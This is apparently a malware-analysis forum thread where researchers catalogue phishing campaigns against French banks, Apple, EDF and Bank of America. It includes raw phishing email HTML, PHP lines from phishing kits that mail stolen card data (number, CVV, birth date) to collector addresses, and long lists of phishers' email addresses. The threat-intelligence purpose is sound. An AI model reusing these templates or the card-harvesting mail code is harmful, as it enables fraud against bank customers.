A forum for reverse engineering, OS internals and malware analysis 

Forum for analysis and discussion about malware.
 #22223  by Xylitol
 Sat Feb 15, 2014 2:00 pm
Apple France phishing
http://www.phishtank.com/phish_detail.p ... id=2286100
https://www.virustotal.com/en/url/cb7af ... 392472889/
Code: Select all
$to = "younsse.b@gmail.com";
$subj = "Apple VBV |".$ip."\n";
$from = "From: appel<zghandiga@mail.fr>";
mail($to, $subj, $message, $from);
Attachments
infected
(179.01 KiB) Downloaded 83 times
 #22858  by Xylitol
 Tue May 13, 2014 9:33 am
BNP Parisbas France
Phishing: https://www.phishtank.com/phish_detail. ... id=2470625 - https://www.virustotal.com/fr/url/349d4 ... 399974228/
Code: Select all
$to = "orionsociete@gmail.com"; 
---
CIC France
redirector: https://www.phishtank.com/phish_detail. ... id=2470621 - https://www.virustotal.com/fr/url/eba57 ... 399973695/
phish: https://www.phishtank.com/phish_detail. ... id=2470619 - https://www.virustotal.com/fr/url/26453 ... 399973703/
Code: Select all
$send="orionsociete@gmail.com"; // Will send the results at this address.   
Code: Select all
x-store-info:8Rlnjmxvy6L6cXs23gz/9HW3P3dIQ3IMEmk6bPuhqkFeiAO8NZTgW2z1H0zn1Nds0fN3c5Klo7vu7o98I7E5YhR4kZQevKGvzLuVPAOqZn9NA0dg9SggcRPZcFoCEe5Si+tXnB5Pw1A=
Authentication-Results: hotmail.com; spf=none (sender IP is 77.245.79.122) smtp.mailfrom=jarik@h88-150-177-98.host.redstation.co.uk; dkim=none header.d=e-i.com; x-hmca=none header.id=hostmailer_cm@e-i.com
X-SID-PRA: hostmailer_cm@e-i.com
X-AUTH-Result: NONE
X-SID-Result: NONE
X-Message-Status: n:n
X-Message-Delivery: Vj0xLjE7dXM9MDtsPTE7YT0wO0Q9MTtHRD0yO1NDTD0w
X-Message-Info: NhFq/7gR1vRUHsnJ/PSy1l63YPGsha/ajv41kkPFaGY6AlqyymBCW7gINe6mZn5VhY8vFIgrPQ42io5f87zWiUXc6i7hUPiTwQ0S3f2qippSk6WAWZU2WGBmPTbHe5BXv+AzJ6HTTq+PL3qqofX8pko8CSZrbbnfPxn1Nhu8Amn02oIC2ISouEtXfMdZi67IONPcMagLsl8V26zToK2uVgZ7Is/Cb202
Received: from relay8out.redstationmail.co.uk ([77.245.79.122]) by SNT0-MC2-F8.Snt0.hotmail.com with Microsoft SMTPSVC(6.0.3790.4900);
	 Tue, 13 May 2014 02:22:15 -0700
Received: from relay2in (relay2in.redstationmail.co.uk [109.73.64.2])
	by relay8out.redstationmail.co.uk (Postfix) with ESMTP id 81BD8140707
	for <**************@live.fr>; Tue, 13 May 2014 11:06:16 +0100 (BST)
Received: from h88-150-177-98.host.redstation.co.uk (88.150.177.98) by relay2in (Redstation ESMTP MAIL Service) with ESMTP id 144290165; Tue, 13 May 2014 09:22:22 +0000
Received: from jarik by h88-150-177-98.host.redstation.co.uk with local (Exim 4.82)
	(envelope-from <jarik@h88-150-177-98.host.redstation.co.uk>)
	id 1Wk8ub-00053Y-Ng
	for **************@live.fr; Tue, 13 May 2014 10:22:13 +0100
To: **************@live.fr
Subject: Alérte !  Adhésion en ligne
MIME-Version: 1.0
Content-type: text/html; charset=iso-8859-1
From: CIC <hostmailer_cm@e-i.com>
Message-Id: <E1Wk8ub-00053Y-Ng@h88-150-177-98.host.redstation.co.uk>
Date: Tue, 13 May 2014 10:22:13 +0100
Return-Path: jarik@h88-150-177-98.host.redstation.co.uk
X-OriginalArrivalTime: 13 May 2014 09:22:15.0472 (UTC) FILETIME=[D4624300:01CF6E8C]

<html>
	<head>
		<title>HTML Online Editor Sample</title>
	</head>
	<body>
		<table align="center" border="0" cellpadding="0" cellspacing="0" style="padding:0px;color:rgb(68, 68, 68);font-size:15px;font-family:Calibri,sans-serif;text-transform:none;background-color:rgb(255, 255, 255);text-indent:0px;letter-spacing:normal;font-style:normal;font-variant:normal;font-weight:normal;line-height:21px;white-space:normal;word-spacing:0px;" width="500">
			<tbody style="padding:0px;line-height:21px;">
				<tr style="padding:0px;line-height:21px;">
					<td style="padding:0px;line-height:21px;">
						<h1 style="padding:0px;text-align:center;line-height:31px;font-family:'Segoe UI Light','Segoe UI Web Light','Segoe UI Web Regular','Segoe UI','Segoe UI Symbol',HelveticaNeue-Light,'Helvetica Neue',Arial,sans-serif;color:rgb(33, 102, 172);font-size:23px;font-weight:normal;">
							<img alt="CIC - Parce que le monde bouge" border="0" height="68" src="https://www.cic.fr/fr/banques/le-cic/actualites-et-publications/e-mailings/DVI/header.gif" style="border:medium none;padding:0px;line-height:31px;" width="500" /></h1>
					</td>
				</tr>
				<tr style="padding:0px;line-height:21px;">
					<td style="padding:0px;line-height:21px;">
						<h2 style="border:1px solid rgb(33, 102, 172);padding:10px;text-align:center;line-height:25px;background-color:rgb(33, 102, 172);letter-spacing:1px;font-family:Arial,Helvetica,sans-serif;color:rgb(255, 255, 255);font-size:18px;font-weight:700;">
							Nouveaux Web Documents disponibles</h2>
					</td>
				</tr>
				<tr style="padding:0px;line-height:21px;">
					<td style="padding:0px;line-height:21px;background-color:rgb(242, 247, 246);">
						<div style="border-style:solid;border-color:rgb(33, 102, 172);border-width:1px 1px 10px;padding:20px 20px 10px;line-height:17px;background-color:rgb(242, 247, 246);font-family:Arial,Helvetica,sans-serif;color:rgb(0, 0, 0);font-size:12px;">
							Bonjour<span class="ecxApple-converted-space" style="padding:0px;"> <span class="ecxApple-converted-space"> </span></span><strong style="padding:0px;line-height:17px;font-weight:bold;">,</strong>
							<p style="padding:0px;line-height:17px;">
								  Lors de votre dernier achat , vous avez été averti par un message vous informant de l'obligation d'adhérer à la nouvelle réglementation concernant la fiabilité pour les achats par C.B. sur internet et de la mise en place d'un arrêt pour vos futurs achats.<br style="padding:0px;line-height:17px;" />
								Or, nous n'avons pas, ce jour, d'adhésion de votre part et nous sommes au regret de vous informer que vous pouvez plus utiliser votre carte sur internet.<span class="ecxApple-converted-space" style="padding:0px;"> </span><br style="padding:0px;line-height:17px;" />
								 </p>
							<p style="padding:0px;line-height:17px;">
								Adhésion :</p>
							<a href="http://www.cpc.ac.th/myfile/admin.html" style="padding:0px;color:rgb(0, 104, 207);text-decoration:underline;line-height:17px;cursor:pointer;" target="_blank">Faites votre demande d'adhésion en ligne en cliquant ici </a><br />
							<p style="padding:0px;line-height:17px;">
								Cordialement,</p>
							<p style="padding:0px;line-height:17px;">
								Votre Conseiller CIC</p>
							<p style="padding:0px;line-height:17px;">
								NB : Ce message vous est adressé automatiquement. Merci de ne pas y répondre.</p>
						</div>
					</td>
				</tr>
				<tr style="padding:0px;line-height:21px;">
					<td style="padding:0px;line-height:21px;">
						<img height="38" src="https://www.cic.fr/fr/banques/le-cic/actualites-et-publications/e-mailings/DVI/footer.gif" style="border:medium none;padding:0px;line-height:21px;" width="500" /></td>
				</tr>
			</tbody>
		</table>
		<table align="center" border="0" cellpadding="0" cellspacing="0" style="padding:0px;color:rgb(68, 68, 68);font-size:15px;font-family:Calibri,sans-serif;text-transform:none;background-color:rgb(255, 255, 255);text-indent:0px;letter-spacing:normal;font-style:normal;font-variant:normal;font-weight:normal;line-height:21px;white-space:normal;word-spacing:0px;" width="475">
			<tbody style="padding:0px;line-height:21px;">
				<tr style="padding:0px 2px 5px;text-align:left;line-height:14px;font-family:Arial,Helvetica,sans-serif;color:rgb(85, 85, 85);font-size:10px;vertical-align:top;">
					<td style="padding:0px;line-height:14px;">
						<img class="ecxDisclaimerPicSize" src="https://www.cic.fr/news/fr/banques/le-cic/actualites-et-publications/newsletters/img/notejuridique-fds.gif" style="border:medium none;padding:0px;line-height:14px;" /></td>
					<td style="padding:0px;line-height:14px;">
						<div style="padding:0px;line-height:14px;">
							Ce message et toutes les pièces jointes sont confidentiels et établis à l'intention exclusive de son ou ses destinataires. Si vous avez reçu ce message par erreur, merci d'en avertir immédiatement l'émetteur et de détruire le message. Toute modification, édition, utilisation ou diffusion non autorisée est interdite. L'émetteur décline toute responsabilité au titre de ce message s'il a été modifié, déformé, falsifié, infecté par un virus ou encore édité ou diffusé sans autorisation.<span class="ecxApple-converted-space" style="padding:0px;"> </span><br style="padding:0px;line-height:14px;" />
							<br style="padding:0px;line-height:14px;" />
							This message and any attachments are confidential and intended for the named addressee(s) only. If you have received this message in error, please notify immediately the sender, then delete the message. Any unauthorized modification, edition, use or dissemination is prohibited. The sender does not be liable for this message if it has been modified, altered, falsified, infected by a virus or even e</div>
					</td>
				</tr>
			</tbody>
		</table></body>
</html>

Attachments
infected
(1008.53 KiB) Downloaded 65 times
infected
(114.97 KiB) Downloaded 64 times
 #24471  by Xylitol
 Sun Nov 30, 2014 5:45 pm
EDF phishing found on a domain with ssl.
Image
Code: Select all
x-store-info:8Rlnjmxvy6L6cXs23gz/9HW3P3dIQ3IM6IQxAzzR5HL9sR+WFHWKwrEVabmWzpUpsBiToLEmd8lM6mTL7+p7fR2OjhcikhYoB9EF2d+QWlYs/Pp1yzlMo1hQSTai8+rG1GxFNLhir58=
Authentication-Results: hotmail.com; spf=neutral (sender IP is 190.210.204.138) smtp.mailfrom=bc-dp_p-ael-automate@edf.fr; dkim=none header.d=edf.fr; x-hmca=none header.id=bc-dp_p-ael-automate@edf.fr
X-SID-PRA: bc-dp_p-ael-automate@edf.fr
X-AUTH-Result: NONE
X-SID-Result: NONE
X-Message-Status: n:n
X-Message-Delivery: Vj0xLjE7dXM9MDtsPTE7YT0wO0Q9MTtHRD0yO1NDTD0w
X-Message-Info: NhFq/7gR1vSvjnTuIopB//0y+G7+pKNDNA+LFKoO0nw2mWm8nfBRwmLrkQ6U+hfsFp2bfTM9Pk+5Y4Bh+dlqVoDFFso0KulrVA6QiF7eLlUpo8edp4wgc9Z4rB2nWnepkgxQueBWkWTadCfuxDoRJSEDSenbRkZ723rfa9GewjGsSAeh1+GsL6x+n6l4ltfk5F3cXjdfLyiQcPNlBNX0gsvvAmlkXAxM
Received: from cloud10.tudns7.info ([190.210.204.138]) by COL004-MC2F18.hotmail.com over TLS secured channel with Microsoft SMTPSVC(7.5.7601.22751);
	 Fri, 28 Nov 2014 13:36:20 -0800
Received: from 64.ip-92-222-16.eu ([92.222.16.64]:63126 helo=User)
	by cloud10.tudns7.info with esmtpa (Exim 4.82)
	(envelope-from <bc-dp_p-ael-automate@edf.fr>)
	id 1XuTCz-0003iR-HW; Fri, 28 Nov 2014 18:36:11 -0300
From: "Votre espace Client EDF"<bc-dp_p-ael-automate@edf.fr>
Subject: Non Réception de paiement
Date: Fri, 28 Nov 2014 22:35:49 +0100
MIME-Version: 1.0
Content-Type: text/html;
	charset="utf-7"
Content-Transfer-Encoding: 7bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2600.0000
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000
X-AntiAbuse: This header was added to track abuse, please include it with any abuse report
X-AntiAbuse: Primary Hostname - cloud10.tudns7.info
X-AntiAbuse: Original Domain - live.fr
X-AntiAbuse: Originator/Caller UID/GID - [47 12] / [47 12]
X-AntiAbuse: Sender Address Domain - edf.fr
X-Get-Message-Sender-Via: cloud10.tudns7.info: authenticated_id: magali@pprmint.com.ar
X-Source: 
X-Source-Args: 
X-Source-Dir: 
Bcc:
Return-Path: bc-dp_p-ael-automate@edf.fr
Message-ID: <COL004-MC2F18SrIykl00073dea@COL004-MC2F18.hotmail.com>
X-OriginalArrivalTime: 28 Nov 2014 21:36:20.0675 (UTC) FILETIME=[59932130:01D00B53]

</div><div class="FBR"></div><div class="FBA"></div></div><div class="ClearBoth"><div id="mpf0_wideMsgBarPlaceholder" 

class="WideMessageBarContainer"></div></div></div><div class="ClearBoth"></div><div id="mpf0_readMsgBodyContainer" class="ReadMsgBody" onclick="return Control.invoke

('MessagePartBody','_onBodyClick',event,event);"><div class="SandboxScopeClass ExternalClass" id="mpf0_MsgContainer"><div class="ecxyiv590923720SandboxScopeClass 

ecxyiv590923720ExternalClass" id="ecxyiv590923720mpf0_MsgContainer"><p><img src="http://www.assistance-client.fr/wp-content/uploads/2012/04/edf-bleu-ciel-espace-client1.jpg" 

width="190"></p>
<p><strong><font color="#ff9900" face="Verdana" size="2">Cher(e) EDF Client(e) :</font></strong></p>
 <font face="Arial" size="2">
<p>Votre paiement a été refusé par votre établissement bancaire en raison d'un problème 

technique sur le systeme de prélèvement automatique.</p>


<UL>
<LI><b>Dépassement du plafond journalier,
<LI>Erreur de saisie des données bancaires,
<LI>Erreur de la saisie du nom du titulaire de la carte de crédit.</b>
</UL>




<p>Pour éviter la pénalités du retard, nous vous donnons la possibilité de payer en ligne.</p>
<p>Afin de régler votre facture <font color="green" face="arial"><strong>N° F03247.6195.8456.1628</strong></font>, 

cliquer sur le lien ci-dessous :</p>
<p align=""><a rel="nofollow" href="https://mon-agences1clients.com/facture/f4/particuliers.edf.com/gestion-de-mon-contrat/ma-facture/regler-ma-facture/getOrder.php" target="_blank"><strong>  <b>‹‹ Régler votre facture ››</b></strong></a></p>
<p>Lors d'échec de régularisation de votre situation, nous procéderons à la suspension de 





fourniture d'energie, Cette intervention vous sera facturée .</p>

</font><p><font face="Arial" size="2">
ATTENTION : Ce message est strictement confidentiel. Son 		intégrité n'est pas assurée sur Internet.<br /> Si 

vous n'etes pas destinataire du message, merci de le détruire.

EDF SA au capital de 924 433 331 €, <br />
RCS Paris n° 552 081 317, siège social 22-30 av de Wagram 75382 Paris cedex 08.

Copyright © EDF 2014
</font>
https://www.virustotal.com/en/url/cfb94 ... 417370027/
Code: Select all
$send="drotanique8@gmail.com";
Attachments
infected
(986.48 KiB) Downloaded 61 times
 #24534  by Xylitol
 Fri Dec 05, 2014 4:38 pm
edf campaign
Code: Select all
hxxp://203.151.161.33/mail/xwDE-gftO2-66_OPlkLK4lhh45-00gHHygTFDCVbnv-gVGh_JKKgEDS-982ZfcgDD612DedD__Ded098fFKJ.php
https://www.virustotal.com/en/url/68027 ... 417798624/
Code: Select all
$send = "obito2015@outlook.fr,jacob.jackson2015@gmail.com";
Attachments
infected
(10.58 KiB) Downloaded 61 times
 #24556  by malwarelabs
 Tue Dec 09, 2014 12:50 pm
Apple canadian customer:
Code: Select all
http://69.50.193.224/i/
http://69.50.193.224/e/
Code: Select all
$subj = "Infos 2 CANADA : $ip / $nume - $cc";
$msg = "
Phone: $phone
MMN: $country
Address: $adresa
Town/City: $oras
Postal Code: $zip
-
Holder's Name: $nume
DOB (DD/MM/YYYY): $dobd / $dobm / $doby
-
Card Number: $cc
Expires: $expm / $expy
Security Code: $cvv
-
SortCode: $sortcode
__________________
IP: $ip";

mail("furainpulamea2000@gmail.com", $subj, $msg);
Attachments
infected
(94.68 KiB) Downloaded 62 times
 #24691  by Pr0xymu5
 Sun Dec 21, 2014 11:01 pm
Various sample of emails address of phishers

gatorsfn111@gmail.com
ammagogetter2@gmail.com
audu0147@gmail.com, tonygray277@yahoo.com
bidvestinc@gmail.com
bighugs52@gmail.com
blessbox1@gmail.com
carriez77@inbox.com
chongwale123@gmail.com
constantkid60@gmail.com
gatorsfn111@gmail.com
ghjk920@gmail.com
goodslife2012@yandex.ru
guccispammer@gmail.com
heavenmanner@gmail.com
humphries29@yahoo.com
ilefoaiye@gmail.com,ilefoilluminati@yandex.com
jeconerty@blumail.org,gaso@anitaramos.com.mx
jen2care4u29@gmail.com
johnoffice4jobs@gmail.com
'kellyweaver0004@gmail.com'
keneurope81@gmail.com,keneurope81@yahoo.com
kkwire8@gmail.com,kkwire@aol.com
kkwire8@gmail.com,saves.kkwire@aol.com
kuhiparrma232@gmail.com
lawrenceinc@outlook.com
legendaryzones@gmail.com
luca.fran2014@mimosa-vessel.com,jessica@hdw-offshorevessel.com
mohey72@yahoo.com
mohey72@yahool.com
naks@top2roues.com,hedgemi@blumail.org
nettywire@gmail.com
okekeifeanyi03@gmail.com, smartcet@yahoo.com
olaafeez60@yahoo.com
olybg20000@gmail.com
ricksmithnig45@yahoo.co.jp, jameskumarpvtltd@gmail.com, sstephen959@gmail.com
saveyourtul@gmail.com,saves.ttull@aol.com
shevie18@live.com
sirpangy@blumail.org
southofluv@gmail.com
ssherryk@gmail.com
stefweizer@gmail.com
wantthem@yahoo.com, kenthory78@hotmail.com
zubix02@she.com
 #24784  by Pr0xymu5
 Wed Dec 31, 2014 11:22 am
Various emails of phishers collected at december (amazon, various banks, paypal, etc.)
What's the interesting I found 861 source of phishing pages but from these sources I found only 241 unique addresses email. So statistic tell us, that one phisher makes ~3,5 phishing sites or I should improve my scripts :)
Code: Select all
12alexjohn12@gmail.com
abdoel@gmail.com
abdoelmokiem@gmail.com
abdouelkacimi00@gmail.com
abzolute2009@yahoo.com
achraflawi@gmail.com
adewale102@gmail.com
aladun12341@hushmail.com
ALIHADIRESULT786@gmail.com
ammagogetter2@gmail.com
ammagogetter@gmail.com
andreshh12345@gmail.com
anon.tun10@yahoo.fr
arabmoni10@gmail.com
ardent.service@comcast.net
areaconsular@gmail.com
ashtonamanda67@gmail.com
aspapi1231@gmail.com
attachua667@yandex.com
audu0147@gmail.com
audu0147@outlook.com
babakollieempire@gmail.com
barcs.result@yandex.com
baronlogins@gmail.com
benhathaway59@gmail.com
ben.johnson151@yahoo.com
bholla101@gmail.com
bidvestinc@gmail.com
bighugs52@gmail.com
bigresult14@gmail.com
blackstardeniim@gmail.com
blessbox1@gmail.com
blessing.box1958@gmail.com
blowtime666@gmail.com
boara@hotmail.fr
bok.brahim@gmail.com
by.kadhafi@yahoo.fr
campellmicheal@gmail.com
carpadona@hotmail.com
carriez777@inbox.com
carriez77@inbox.com
chongwale123@gmail.com
constantkid60@gmail.com
controlboxx2016@gmail.com
da274324@gmail.com
danamccarthyabstract@gmail.com
danielobie66@gmail.com
dericktomy0@gmail.com
djomosouth@gmail.com
dmorgan8108@gmail.com
domainmaintenance0001@gmail.com
donzaza17@yahoo.com.sg
douglasdockter19@gmail.com
dude.lovers01@gmail.com
echayoub@gmail.com
echoii1993@gmail.com
e.feyisetan@yahoo.com
elainecordova25@yahoo.com
entrycyber@gmail.com
ericmelder1@gmail.com
esyhack@gmail.com
feyissmith@gmail.com
fhoule10@yahoo.com
fidelityfundscenter@outlook.com
Firstchampion57@gmail.com
flyflyjewel@yahoo.com
fredsunday77@gmail.com
gabrielharper92@gmail.com
gaso@anitaramos.com.mx
gatorsfn111@gmail.com
generalmartins101@gmail.com
ghjk920@gmail.com
gilbertbever@gmail.com
godgrace630@gmail.com
goodluckwirebox@gmail.com
goodslife2012@yandex.ru
guccispammer@gmail.com
hackergabbay20@gmail.com
hayweezy001@aol.com
heavenmanner@gmail.com
hedgemi@blumail.org
helgaoui@gmail.com
here.result2015@yandex.com
hizzo.fireman@hotmail.com
hm_mahesh@outlook.com
hrrscrg46@gmail.com
humphries29@yahoo.com
ilefoaiye@gmail.com
ilefoilluminati@yandex.com
info.global@gala.net
injector_db@yahoo.com
isaacality0001@gmail.com
izlasdenris@gmail.com
james_lanford@yahoo.com
jamesstyles252@gmail.com
jawaharsondaram@gmail.com
jayblisson@gmail.com
jaygbon@gmail.com
jeconerty@blumail.org
jen2care4u29@gmail.com
jessica@hdw-offshorevessel.com
jet.jones@outlook.com
jobs.mystry@gmail.com
johnalexi080@gmail.com
johnoffice4jobs@gmail.com
joyceyoyow@gmail.com
juststevenrivera@gmail.com
kamkundu123@hotmail.com
kellyweaver0004@gmail.com
keneurope81@gmail.com
keneurope81@yahoo.com
kenitrazazloz@gmail.com
kick12345@inbox.lv
kkwire8@gmail.com
kkwire@aol.com
krisresults@g.pl
kuhiparrma232@gmail.com
kusdapuresoul@gmail.com
lawrenceinc@outlook.com
leet.jenin@gmail.com
legendaryzones@gmail.com
lmariouh@gmail.com
london20038@gmail.com
luca.fran2014@mimosa-vessel.com
lucrecio15@gmx.com
luyebird@gmail.com
mail.231@yandex.com
maryball9881@gmail.com
masakra02@yahoo.com
megacash231@yandex.com
megafingers@yandex.ru
mentor838@mail.com
mikecole400@gmail.com
mjaes457@blumail.org
mohey72@yahoo.com
mohey72@yahool.com
molllycofman@gmail.com
mother_love@inbox.com
mrsmithlaw25@pl
msswingley@gmail.com
myworldbkrezults@contractor.net
naks@top2roues.com
named-recipient@example.org
nappyberry@gmail.com
nettywire@gmail.com
newblessing147@globomail.com
newblessing@g.pl
nolimit0147@gmail.com
odeayo@outlook.com
ogavirus@gmail.com
ojuoluwao@gmail.com
okekeifeanyi03@gmail.com
olaafeez60@yahoo.com
olaolu336@gmail.com
o.lokoso11@gmail.com
olybg20000@gmail.com
omriaymen72@gmail.com
optimus316@gmail.com
owrich13@gmail.com
painsama200@gmail.com
pammingway@lycos.com
Pharsomoney@gmail.com
pickandshipp247@gmail.com
piko.mohamed@gmail.com
p.lord55@yandex.com
pplrzlta@gmail.com
r.29sn3@gmail.com
rafikfcb2014@gmail.com
rdpresults@gmail.com
recipient-with-name@example.org
redjab04@gmail.com
result3box@yahoo.com
result.barcs@gmail.com
resultbox500@blumail.org
resultboxes@yandex.com
resultboxforsuch@outlook.com
resultstudent@yandex.com
rezultnew2014@gmail.com
rezult.sp@hotmail.com
richcoolonboard101@gmail.com
ricksmithnig45@yahoo.co.jp
romanticpratt@gmail.com
rosscrossover@gmail.com
rosswilliams1000@gmail.com
rp2g2606@gmail.com
rutherforddarwin@gmail.com
saves.kkwire@aol.com
saves.ttull@aol.com
saveyourtul@gmail.com
service.bofa@yandex.com
seyitobidara@yopmail.com
shevie18@live.com
sidalilos160@gmail.com
singapor147@gmail.com
sirpangy@blumail.org
slimdurlz001@yahoo.com
southofluv@gmail.com
spaartax@hushmail.com
spam4log@gmail.com
spammanagingdirector2015@gmail.com
sqslam@gmail.com
ssherryk@gmail.com
stefweizer@gmail.com
stevetafi22@gmail.com
stevetafi2@gmail.com
sunday.kazeem@yandex.com
superbolly55@gmail.com
the-_-coco@hotmail.com
thomas.uher02@gmail.com
thomrichard66@gmail.com
tmoog2@gmail.com
unicefcareer@gmail.com
virusxhima@gmail.com
wantthem@yahoo.com
whealylisa@gmail.com
wiredelux1@gmail.com
wiredelux@gmail.com
wirewirebox@gmail.com
xp.abdou@hotmail.com
yankee0147@gmail.com
yassinoxtn09@gmail.com
youngcruz098@gmail.com
youssef.mansour20@gmail.com
zubix02@she.com
e_alternative@yahoo.com
jameskumarpvtltd@gmail.com
jessicawilliams748@inbox.lv
johnworkman1252@yahoo.com
kenthory78@hotmail.com
logznew@gmail.com
miroslavznamenak@aol.com
n0ce@globomail.com
patrickchad6@gmail.com
resultresultstudent@gmail.com
resultstudent@yandex.com
satishmakina@yahoo.ie
smartcet@yahoo.com
sstephen959@gmail.com
tonygray277@yahoo.com
tonygray755@yahoo.com
zouaouihafid@gmail.com
 #24959  by Pr0xymu5
 Thu Jan 15, 2015 7:10 pm
Domains in the html file:
bankofamerica.com.login.webscr.accounts.e3c2b44a283a7e4a60028b82ce1e8ad11d.franciscoeltata.com.ve
Code: Select all
$send= "david.baker@artlover.com,carpadona@yahoo.com";
source attached in 7z file
Attachments
infected
(408.36 KiB) Downloaded 64 times